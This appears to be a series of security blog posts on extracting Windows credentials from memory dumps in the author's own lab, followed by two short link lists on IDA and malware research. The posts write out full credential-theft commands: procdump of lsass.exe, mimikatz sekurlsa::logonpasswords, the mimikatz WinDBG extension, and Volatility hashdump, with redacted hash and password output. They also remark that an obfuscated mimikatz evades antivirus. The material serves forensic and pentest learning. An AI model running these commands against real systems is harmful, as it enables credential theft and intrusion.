Windows Credentials and Memory Dumps – Part 4: Volatility & Mimikatz

For this test I installed everything in a WinXP VM. I followed these instructions:
… with only small changes, because I had a win32 machine.
First things first: The plugins seems to be PoC and supports Windows Vista & 7 with 32 & 64 Bit (Maybe works for Win Server 2008 too?).
Here are the steps for installing volatility with the plugin:
Download & install Python 2.7.x from https://www.python.org/downloads/release
Download & install Microsoft Visual C++ Compiler for Python 2.7 https://www.microsoft.com/en-us/download/details.aspx?id=44266
(Don’t know if that was really neccessary)
C:\Python27\Scripts>python.exe -m pip install distorm3
C:\Python27\Scripts>python.exe -m pip install Pycrypto
C:\Python27\Scripts>python.exe -m pip install yara
C:\Python27\Scripts>python.exe -m pip install construct
I downloaded the mimikatz plugin for volatility from:
and stored it in c:\volatility-plugins.
Check:
C:\>python.exe “c:\Python27\Scripts\vol.py” –plugins=”c:\volatility-plugins” –info | findstr /i mimi
Volatility Foundation Volatility Framework 2.4
linux_slabinfo             – Mimics /proc/slabinfo on a running machine
mimikatz                   – mimikatz offline
Success…
Then copy the test.elf image from part 1 to the vm.
Now it is possible to fetch the credentials in clear text:
C:\>python “c:\python27\scripts\vol.py” –plugins=”c:\volatility-plugins” -f “z:
\DAXAMD-20160124-111555.raw”  –profile=Win7SP0x64 mimikatz
Volatility Foundation Volatility Framework 2.4
Module   User             Domain           Password
——– —————- —————- —————————————-
wdigest  __vmware_user__  daxamd           XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
wdigest  dax              daxamd           XXXXXXXXXXXXXXXXXX
wdigest  DAXAMD$          WORKGROUP
Advertisements

Memdumps, Volatility, Mimikatz, VMs – Part 3: WinDBG Mimikatz Extension

Now this is interesting. It is possible to load a full memory dump into WinDBG, load mimikatz and dump the credentials in cleartext. For this I used the dump of the windows 7 machine from part 2.
For this:
– Download & Install WinDBG
– Download MoonSols Windows Memory Toolkit (http://www.moonsols.com/windows-memory-toolkit/)
Convert the memory image:
C:\Users\dax\Downloads\MWMT-v1.4>bin2dmp.exe ..\volatility_2.5.win.standalone\DAXAMD-20160124-111555.raw ..\volatility_2.5.win.standalone\DAXAMD-20160124-111555.dmp
Note: Don’t use the volatility built-in funcion raw2dmp for this task. This did not work for me.
In WinDBG:
– For x64 dump start WinDBG (x64)
– Open the crashdump
Then:
0: kd> .load c:\users\dax\downloads\mimikatz\x64\mimilib.dll
  .#####.   mimikatz 2.0 alpha (x64) built on Jan 17 2016 00:38:45
 .## ^ ##.  “A La Vie, A L’Amour” – Windows build 7601
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ‘## v ##’   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  ‘#####’                                  WinDBG extension ! * * */
===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================
0: kd> .SymFix
0: kd> .Reload
Loading Kernel Symbols
………………………………………………………
……………………………………………………….
……………………………………….
Loading User Symbols
…..
Loading unloaded module list
….Unable to enumerate user-mode unloaded modules, NTSTATUS 0xC0000147
Loading Wow64 Symbols
……………..
0: kd> !process 0 0 lsass.exe
PROCESS fffffa80072b2b10
    SessionId: 0  Cid: 01dc    Peb: 7fffffd6000  ParentCid: 0188
    DirBase: 137127000  ObjectTable: fffff8a001159230  HandleCount: 660.
    Image: lsass.exe
0: kd> .process /r /p fffffa80072b2b10
Implicit process is now fffffa80`072b2b10
Loading User Symbols
……………………………………………………….
0: kd> !mimikatz
DPAPI Backup keys
=================
Current prefered key:       {00000000-0000-0000-0000-000000000000}
Compatibility prefered key: {00000000-0000-0000-0000-000000000000}
SekurLSA
========
Authentication Id : 0 ; 835674 (00000000:000cc05a)
Session           : Interactive from 0
User Name         : __vmware_user__
Domain            : daxamd
Logon Server      : DAXAMD
Logon Time        : 24.01.2016 12:09:33
SID               : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    msv :
     [00010000] CredentialKeys
     * NTLM     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     * SHA1     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     [00000003] Primary
     * Username : __vmware_user__
     * Domain   : daxamd
     * NTLM     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     * SHA1     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    tspkg : KO
    wdigest :
     * Username : __vmware_user__
     * Domain   : daxamd
     * Password : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    kerberos :
     * Username : __vmware_user__
     * Domain   : daxamd
     * Password : (null)
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 221616 (00000000:000361b0)
Session           : Interactive from 1
User Name         : dax
Domain            : daxamd
Logon Server      : DAXAMD
Logon Time        : 24.01.2016 12:07:40
SID               : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    msv :
     [00000003] Primary
     * Username : dax
     * Domain   : daxamd
     * NTLM     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     * SHA1     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     [00010000] CredentialKeys
     * NTLM     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     * SHA1     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    tspkg : KO
    wdigest :
     * Username : dax
     * Domain   : daxamd
     * Password : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    kerberos :
     * Username : dax
     * Domain   : daxamd
     * Password : (null)
— cut —
Again, I found this one awesome.
Links:

Memdumps, Volatility, Mimikatz, VMs – Part 2: Windows 7 Full Memory Dump & Get Hashes

For this part we first make a memory dump with the moonsols dumit.exe tool (using my physical Windows 7 x64 machine):
dumpit0551934099191ca7d24e3bd4552ee139
The next steps are simple volatility calls, like getting the basic image information:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f DAXAMD-20160124-111555.raw imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search…
          Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win200
8R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (C:\Users\dax\Downloads\volati
lity_2.5.win.standalone\DAXAMD-20160124-111555.raw)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80002ff20f0L
          Number of Processors : 2
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80002ff3d00L
                KPCR for CPU 1 : 0xfffff880009e8000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2016-01-24 11:16:03 UTC+0000
     Image local date and time : 2016-01-24 12:16:03 +0100
Get the hivelist:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f DAXAMD-20160124-111555.raw hivelist –profile Win7SP1x64
Volatility Foundation Volatility Framework 2.5
Virtual            Physical           Name
—————— —————— —-
0xfffff8a00000f010 0x0000000153e5d010 [no name]
0xfffff8a0000231f0 0x0000000153e1f1f0 \REGISTRY\MACHINE\SYSTEM
0xfffff8a000062010 0x0000000150d76010 \REGISTRY\MACHINE\HARDWARE
0xfffff8a000121010 0x0000000149c8e010 \SystemRoot\System32\Config\SOFTWARE
0xfffff8a000d55010 0x0000000148258010 \Device\HarddiskVolume1\Boot\BCD
0xfffff8a000e04200 0x000000013b7ad200 \SystemRoot\System32\Config\DEFAULT
0xfffff8a001219010 0x0000000132d35010 \SystemRoot\System32\Config\SECURITY
0xfffff8a001290010 0x0000000131e09010 \SystemRoot\System32\Config\SAM
0xfffff8a00143c010 0x000000012fa23010 \??\C:\Windows\ServiceProfiles\NetworkServ
ice\NTUSER.DAT
0xfffff8a00151a240 0x000000012c2b9240 \??\C:\Windows\ServiceProfiles\LocalServic
e\NTUSER.DAT
0xfffff8a002261010 0x000000010db7f010 \??\C:\Users\dax\ntuser.dat
0xfffff8a0022f6410 0x0000000148132410 \??\C:\Users\dax\AppData\Local\Microsoft\W
indows\UsrClass.dat
0xfffff8a004e77010 0x0000000110fea010 \??\C:\System Volume Information\Syscache.
hve
0xfffff8a00ceae010 0x000000007eeb9010 \??\C:\Windows\System32\config\COMPONENTS
Help!
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.e
xe hashdump -h
Volatility Foundation Volatility Framework 2.5
Usage: Volatility – A memory forensics analysis platform.
Options:
  -h, –help            list all available options and their default values.
                        Default values may be set in the configuration file
                        (/etc/volatilityrc)
  –conf-file=.volatilityrc
                        User based configuration file
  -d, –debug           Debug volatility
  –plugins=PLUGINS     Additional plugin directories to use (semi-colon
                        separated)
  –info                Print information about all registered objects
  –cache-directory=C:\Users\dax/.cache\volatility
                        Directory where cache files are stored
  –cache               Use caching
  –tz=TZ               Sets the (Olson) timezone for displaying timestamps
                        using pytz (if installed) or tzset
  -f FILENAME, –filename=FILENAME
                        Filename to use when opening an image
  –profile=WinXPSP2x86
                        Name of the profile to load (use –info to see a list
                        of supported profiles)
  -l LOCATION, –location=LOCATION
                        A URN location from which to load an address space
  -w, –write           Enable write support
  –dtb=DTB             DTB Address
  –shift=SHIFT         Mac KASLR shift address
  –output=text         Output in this format (support is module specific, see
                        the Module Output Options below)
  –output-file=OUTPUT_FILE
                        Write output in this file
  -v, –verbose         Verbose information
  -g KDBG, –kdbg=KDBG  Specify a KDBG virtual address (Note: for 64-bit
                        Windows 8 and above this is the address of
                        KdCopyDataBlock)
  –force               Force utilization of suspect profile
  -k KPCR, –kpcr=KPCR  Specify a specific KPCR address
  –cookie=COOKIE       Specify the address of nt!ObHeaderCookie (valid for
                        Windows 10 only)
  -y SYS_OFFSET, –sys-offset=SYS_OFFSET
                        SYSTEM hive offset (virtual)
  -s SAM_OFFSET, –sam-offset=SAM_OFFSET
                        SAM hive offset (virtual)
Module Output Options: dot, greptext, html, json, sqlite, text, xlsx
———————————
Module HashDump
———————————
Dumps passwords hashes (LM/NTLM) from memory
What we need for getting the hashes:
y=virtual location of system
s=virtual location of sam
Dump the hashes:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe hashdump -f DAXAMD-20160124-111555.raw –profile Win7SP1x64 -y 0xfffff8a0000231f0 -s 0xfffff8a001290010
Volatility Foundation Volatility Framework 2.5
Administrator:500:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Gast:501:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
dax:1001:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
HomeGroupUser$:1002:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
otto:1007:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
__vmware_user__:1015:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
UpdatusUser:1016:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Link:

Memdumps, Volatility, Mimikatz, VMs – Part 1: Mimikatz & lsass.exe Dump

Part 1 is simple. Dump the lsass.exe process and use mimikatz for getting the credentials as clear text and the hashes. You need admin or system rights for this.
But as a short reminder first let’s have a look at the “normal” way for dumping credentials from the lsass.exe process with mimikatz:
mimikatz # privilege::debug
Privilege ’20’ OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 534844 (00000000:0008293c)
Session           : Interactive from 0
User Name         : dax
— cut —
If you do not have a self compiled or otherwise obfuscated mimikatz version every antivirus scanner will do its work. But it is also possible to read credentials from memory dump.
Make memory dump with Process explorer:
prxp624447fe299fa27348bebd7a23b30eb
… remember to make a full dump.
Or use procdump:
procdump -accepteula -ma lsass.exe lsass.dmp
which is much better for pentesters who only have access over a shell.
For dumping the credentials in clear text use mimikatz:
mimikatz # sekurlsa::minidump e:\lsass.dmp
Switch to MINIDUMP : ‘e:\lsass.dmp’
mimikatz # sekurlsa::logonPasswords
Opening : ‘e:\lsass.dmp’ file for minidump…
Authentication Id : 0 ; 534844 (00000000:0008293c)
Session           : Interactive from 0
User Name         : dax
Domain            : DAX-RYMZ48Z3EYO
Logon Server      : DAX-RYMZ48Z3EYO
Logon Time        : 23.01.2016 14:42:11
SID               : S-1-5-21-436374069-688789844-839522115-1003
        msv :
         [00000002] Primary
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * LM       : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
         * NTLM     : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
         * SHA1     : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
        wdigest :
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * Password : XXXXXXX
        kerberos :
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * Password : XXXXXXX
— cut —
Links:

Memdumps, Volatility, Mimikatz, VMs – Overview

The last weeks I experimented with how to get user crendentials from memory dumps, and hopefully I will have the time to contiue this little “research” (I know, it is not really research when you just writup stuff 😉 ). There are many different ways to dump credentials as hashes or in cleartext from various types of memory dumps, so I think that will become a few short articles. I added links for sources and more in depth information.
Highly interesting for me is how to obtain memory dumbs from virtual machines when you have access to the host system. Further I will have a look at countermeasures in a later part (whereby I mean monitoring and logging).
Overview

Very first steps with IDA

Recently I started using IDA. For me it has a steep learning curve, and some people I talked to agreed. So here are a few links for the first steps if you want to get into IDA. I assume you already know assembly and know what reversing is. Of course there are many more on the web, but I felt comfortable with those at the moment. If you have good links about it let me know.
Dynamic Analysis
Static Analysis
This looks good but is in German: http://blog.tr4ceflow.com/tools/ida-pro-65.html
For training do crackmes:
Further I found these links useful:

Some Great Links for Malware Research

Last week I attended this years Brucon, where I had the chance to participate in the Malware Triage workshop by https://twitter.com/herrcore and https://twitter.com/seanmw. The workshop is awesome (look here to get the idea: http://herrcore.blogspot.de/2014/09/crowdsourced-malware-triage.html) and if you have the chance to take it go for it! The links here are from their slides and I post it in agreement (thank you):